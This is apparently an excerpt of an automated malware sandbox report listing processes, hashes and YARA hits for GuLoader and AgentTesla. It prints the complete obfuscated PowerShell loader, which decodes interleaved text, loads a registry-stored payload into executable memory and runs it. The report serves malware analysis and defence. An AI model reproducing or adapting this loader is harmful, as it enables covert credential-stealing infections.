                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh 
GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelkuITamBlpLdoChrLutBa(An`"""SegAddFriFr3af2Tr`"""No)Ga]GlpFruFobSclIriLecDo UmscatOuaNytCeiStcfo DieTjxbltMoefurkinSc FliBlnSttSi DoPmatKrVFuiImsSuiNobHelSaeAf(PeiBrnSktSt BjSsnaKutAf,PaiCynIntRo ciAPssPspKoafa,LsiSenbatsl JePRerTajSesTiiUnsTg)su;Ny[HuDSalGalTjIOlmSepAropirRetLe(Vi`"""DeuLesAfeSmrFo3Bu2An`"""pa)Sw]SkpAcuDibinlKriNrcBl TasUntBiaPotAniIncCh CoeFrxPltLoeUnrPenTo HyiTunprtMa jaGPreFotBuMSkeSpsNssBeaMagAieTi(PoiinnautSl TyGTuiChrDi,TriLanHotSt AmSSitTorDoaFa,SkibanRetin PrkBeiInpPrkRoaLalBo,AdiAnnAntGe UlFBeiRerNr)So;Kh[InDHolRilRkIGumrepfloGarIstLa(Pa`"""PekEseSkrArnSaeChlMe3An2ti`"""Ji)Ca]SapCeuCabAflReiTocUn PesCltLiaSetOciDacCh KoeAlxUntPreDerNinCi DiiFonPltFl DuVPoiSarFotHeuOgaThlFeAUnlMolSeoDicRe(TrisknSytDo SevNe1Ko,KaiBanBetNi PrvKn2Bi,HeiBanAmtMo InvSt3Bu,CoiMunMitTr Sivti4To)Tr;Bl[MaDinlDelJuISvmMepKboMirRitVi(Gr`"""DiAToDboVToAMaPMiIHa3Hv2Ho.BrDDeLKaLUn`"""Ru)Am]RgpKauTybVilDaiUncCh 
TosNetUnaMetUniBrcSe SeeNexEntIneDarBinQu AriStnSttOp RaRDoeTrgLiLOvopsaDadOpKHoeFryFr(SiiPhnSatIn syDZaaHocUnrImyBa,FaiUnnaltFo SpSSatHaoUnrPr,TiiHinPutBu NoONanEscfi)He;Po[noDCelHalBlIStmUnpUnoDarArtGi(Ge`"""SpgundSliMo3Sp2Pa`"""Em)Ti]AlpDiuFabTrlLiiChcGe PosKotHoaCetFliStcSe TreLsxRetAceUrrConBa FoiInnMitTr DdWAeiGedKaePrnfiPTjaSttBlhVe(StiHanTutIs TeOGabBydBauTr)St;Ra}Fj'Al;Bj`$DdTPohPawPlaRerFrtFrnvieVisDesSh3Gu=Fr[UdTPshRewKaaOnrSetPjnTreScsWosAr1Ov]Ca:Kn:frVMaiVirSetheuHoaVelStANulArlFooNocSu(So0Nu,Re1Mi0Cl4Ha8Mi5Pr7Ka6Mo,Un1Un2Fr2Br8Ce8Sm,pe6Tr4po)jo;Se`$ReNWiaCreFggLaaAntTaePu=Mi(NoGBleMntBu-ScIPatCieNemAuPDyrFooKupSleKurTrtInyKa Tv-haPBaaExtLohLi Ch'GyHFiKSuCSeUEn:Fr\InTVorMuekaeUotPsiSksIneFu\SkFAneDijStlErtCaoCalHvkBlnPoiPrnNegCheBanovsMu1Ef6Fo0Ka'Ha)Ci.TiHBaeSulViafofSotBoeHonElsSlfMoiKolLomSyeLnnResBr;Ft`$FoVToiJalKrlfeiPagPesRetAreKnsSy Ne=Tv Rl[VoSCyyKnsadtLeeAdmSk.OuCAdoUnnHevnoeFirNotSi]Ov:Ac:RaFMurZeoKmmevBBeaNysMueRe6Un4MoSSltRerStiUnnCogKl(Ga`$StNChaGeePrgAuaLotObeFa)Me;Kv[SoSGryBesMatEmeSmmFe.crRInuGrnLetRiiStmdeeIm.KaIFrnAjtFleOprcroBepPrSGaeGrrSnvIniGncOveHosFa.HaMInaVerGosFrhAnaAllBl]Fr:El:WaCVaoVapCoyir(Un`$HiVTriSilSwlShiSagCosartFreSlsCa,Br ca0Gs,Ru Be Cr`$HeTRehBewBiaWorFltUnnOveUnsHysVa3Ug,By Zy`$BiVSpiSalGrlKoiSvgKrsLitUdeDrsAd.HecMioPouAjnCttHa)Ov;Me[HyTBuhPrwFyausrAntBenMaeMospasHo1In]Je:Sa:HoEtrnBiuPimFrSBrycesditBeeKamUdLAeoDrcKoaGelOpeLesGeWVi(Bo`$feTSahSkwJoaEnrCitPrnPeeSasTossi3Bi,be Kr0De)rh#Te;""";Function Thwartness4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Sallowy = $Sallowy + $HS.Substring($i, 1); } $Sallowy;}$Fictioneer0 = Thwartness4 'UdIReEDiXSk ';$Fictioneer1= Thwartness4 $Saudiarabiske;&$Fictioneer0 $Fictioneer1;;
                          Imagebase:0x720000
                          File size:433152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2688111783.0000000009190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate

                          Target ID:6
                          Start time:18:47:03
                          Start date:28/11/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6297d0000
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:9
                          Start time:18:47:34
                          Start date:28/11/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline
                          Imagebase:0xdf0000
                          File size:2141552 bytes
                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:moderate

                          Target ID:10
                          Start time:18:47:34
                          Start date:28/11/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB964.tmp" "c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP"
                          Imagebase:0x430000
                          File size:46832 bytes
                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Target ID:11
                          Start time:18:47:54
                          Start date:28/11/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                          Imagebase:0x670000
                          File size:106496 bytes
                          MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000000.2410724852.0000000000B00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                          No disassembly